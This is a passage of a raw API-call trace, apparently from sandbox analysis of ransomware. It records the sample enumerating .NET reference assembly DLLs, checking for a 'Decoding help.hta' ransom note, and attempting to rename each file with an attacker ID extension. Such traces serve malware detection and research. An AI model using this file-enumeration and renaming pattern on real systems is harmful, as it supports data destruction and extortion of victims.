Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Framework.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\microsoft.build.framework.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0057.581] FindNextFileW (in: hFindFile=0x5e2bf0, lpFindFileData=0xaf0fd30 | out: lpFindFileData=0xaf0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb656d644, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb656d644, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb65937a4, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x17000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Build.Utilities.v3.5.dll", cAlternateFileName="")) returned 1 [0057.581] lstrcpyW (in: lpString1=0x1148d0c0, lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0057.581] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 76 [0057.582] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" [0057.582] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\decoding help.hta")) returned 0x1 [0057.582] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Microsoft.Build.Utilities.v3.5.dll") returned -1 [0057.582] lstrlenW (lpString="Microsoft.Build.Utilities.v3.5.dll") returned 34 [0057.582] lstrcmpiW (lpString1="[ID]", lpString2=".dll") returned 1 [0057.582] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0057.582] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 76 [0057.582] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="Microsoft.Build.Utilities.v3.5.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Utilities.v3.5.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Utilities.v3.5.dll" [0057.582] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Utilities.v3.5.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Utilities.v3.5.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Utilities.v3.5.dll" [0057.582] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Utilities.v3.5.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Utilities.v3.5.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Utilities.v3.5.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0057.582] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Utilities.v3.5.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\microsoft.build.utilities.v3.5.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Utilities.v3.5.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\microsoft.build.utilities.v3.5.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0057.582] FindNextFileW (in: hFindFile=0x5e2bf0, lpFindFileData=0xaf0fd30 | out: lpFindFileData=0xaf0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56e9da72, ftCreationTime.dwHighDateTime=0x1ca03fe, ftLastAccessTime.dwLowDateTime=0x56e9da72, ftLastAccessTime.dwHighDateTime=0x1ca03fe, ftLastWriteTime.dwLowDateTime=0x77d8eb7c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xa400, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.VisualC.STLCLR.dll", cAlternateFileName="")) returned 1 [0057.582] lstrcpyW (in: lpString1=0x1148d0c0, lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0057.582] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 76 [0057.582] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" [0057.582] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\decoding help.hta")) returned 0x1 [0057.582] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Microsoft.VisualC.STLCLR.dll") returned -1 [0057.582] lstrlenW (lpString="Microsoft.VisualC.STLCLR.dll") returned 28 [0057.582] lstrcmpiW (lpString1="[ID]", lpString2=".dll") returned 1 [0057.582] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0057.582] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 76 [0057.583] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="Microsoft.VisualC.STLCLR.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.VisualC.STLCLR.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.VisualC.STLCLR.dll" [0057.583] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.VisualC.STLCLR.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.VisualC.STLCLR.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.VisualC.STLCLR.dll" [0057.583] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.VisualC.STLCLR.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.VisualC.STLCLR.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.VisualC.STLCLR.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0057.583] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.VisualC.STLCLR.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\microsoft.visualc.stlclr.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.VisualC.STLCLR.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\microsoft.visualc.stlclr.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0057.583] FindNextFileW (in: hFindFile=0x5e2bf0, lpFindFileData=0xaf0fd30 | out: lpFindFileData=0xaf0fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x812b9833, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x812b9833, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RedistList", cAlternateFileName="REDIST~1")) returned 1 [0057.583] lstrcmpW (lpString1=".", lpString2="RedistList") returned -1 [0057.583] lstrcmpW (lpString1="..", lpString2="RedistList") returned -1 [0057.583] lstrcmpiW (lpString1="windows", lpString2="RedistList") returned 1 [0057.583] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0057.583] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 76 [0057.583] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="RedistList" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList" [0057.583] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList\\*.*" [0057.583] GlobalMemoryStatus (in: lpBuffer=0xaf0fd10 | out: lpBuffer=0xaf0fd10) [0057.583] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10a9dfd8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x9a8 [0057.584] CloseHandle (hObject=0x9a8) returned 1 [0057.584] FindNextFileW (in: hFindFile=0x5e2bf0, lpFindFileData=0xaf0fd30 | out: lpFindFileData=0xaf0fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x812b9833, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x812b9833, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SubsetList", cAlternateFileName="SUBSET~1")) returned 1 [0057.584] lstrcmpW (lpString1=".", lpString2="SubsetList") returned -1 [0057.584] lstrcmpW (lpString1="..", lpString2="SubsetList") returned -1 [0057.584] lstrcmpiW (lpString1="windows", lpString2="SubsetList") returned 1 [0057.584] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0057.584] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 76 [0057.584] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="SubsetList" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\SubsetList") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\SubsetList" [0057.585] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\SubsetList", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\SubsetList\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\SubsetList\\*.*" [0057.585] GlobalMemoryStatus (in: lpBuffer=0xaf0fd10 | out: lpBuffer=0xaf0fd10) [0057.585] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x4238660, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x9a8 [0057.585] CloseHandle (hObject=0x9a8) returned 1 [0057.585] FindNextFileW (in: hFindFile=0x5e2bf0, lpFindFileData=0xaf0fd30 | out: lpFindFileData=0xaf0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb65937a4, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb65937a4, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb65937a4, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xb000, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.AddIn.Contract.dll", cAlternateFileName="")) returned 1 [0057.585] lstrcpyW (in: lpString1=0x1148d0c0, lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0057.585] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 76 [0057.585] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" [0057.586] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\decoding help.hta")) returned 0x1 [0057.586] lstrcmpiW (lpString1="Decoding help.hta", lpString2="System.AddIn.Contract.dll") returned -1 [0057.586] lstrlenW (lpString="System.AddIn.Contract.dll") returned 25 [0057.586] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0057.586] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 76 [0057.586] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="System.AddIn.Contract.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.AddIn.Contract.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.AddIn.Contract.dll" [0057.586] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.AddIn.Contract.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.AddIn.Contract.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.AddIn.Contract.dll" [0057.586] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.AddIn.Contract.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.AddIn.Contract.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.AddIn.Contract.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0057.586] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.AddIn.Contract.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.addin.contract.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.AddIn.Contract.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.addin.contract.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0057.586] FindNextFileW (in: hFindFile=0x5e2bf0, lpFindFileData=0xaf0fd30 | out: lpFindFileData=0xaf0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb65474e4, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb65474e4, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb656d644, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x28000, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.AddIn.dll", cAlternateFileName="")) returned 1 [0057.586] lstrcpyW (in: lpString1=0x1148d0c0, lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0057.586] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 76 [0057.586] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" [0057.586] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\decoding help.hta")) returned 0x1 [0057.586] lstrcmpiW (lpString1="Decoding help.hta", lpString2="System.AddIn.dll") returned -1 [0057.587] lstrlenW (lpString="System.AddIn.dll") returned 16 [0057.587] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0057.587] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 76 [0057.587] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="System.AddIn.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.AddIn.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.AddIn.dll" [0057.587] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.AddIn.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.AddIn.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.AddIn.dll" [0057.587] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.AddIn.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.AddIn.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.AddIn.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0057.587] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.AddIn.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.addin.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.AddIn.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.addin.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0057.587] FindNextFileW (in: hFindFile=0x5e2bf0, lpFindFileData=0xaf0fd30 | out: lpFindFileData=0xaf0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb64d50c3, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb64d50c3, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb64fb223, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xe000, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.ComponentModel.DataAnnotations.dll", cAlternateFileName="")) returned 1 [0057.587] lstrcpyW (in: lpString1=0x1148d0c0, lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0057.587] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 76 [0057.587] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" [0057.587] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\decoding help.hta")) returned 0x1 [0057.587] lstrcmpiW (lpString1="Decoding help.hta", lpString2="System.ComponentModel.DataAnnotations.dll") returned -1 [0057.587] lstrlenW (lpString="System.ComponentModel.DataAnnotations.dll") returned 41 [0057.587] lstrcmpiW (lpString1="[ID]", lpString2=".dll") returned 1 [0057.587] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0057.587] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 76 [0057.587] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="System.ComponentModel.DataAnnotations.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.ComponentModel.DataAnnotations.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.ComponentModel.DataAnnotations.dll" [0057.587] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.ComponentModel.DataAnnotations.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.ComponentModel.DataAnnotations.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.ComponentModel.DataAnnotations.dll" [0057.587] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.ComponentModel.DataAnnotations.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.ComponentModel.DataAnnotations.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.ComponentModel.DataAnnotations.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0057.587] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.ComponentModel.DataAnnotations.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.componentmodel.dataannotations.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.ComponentModel.DataAnnotations.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\reference 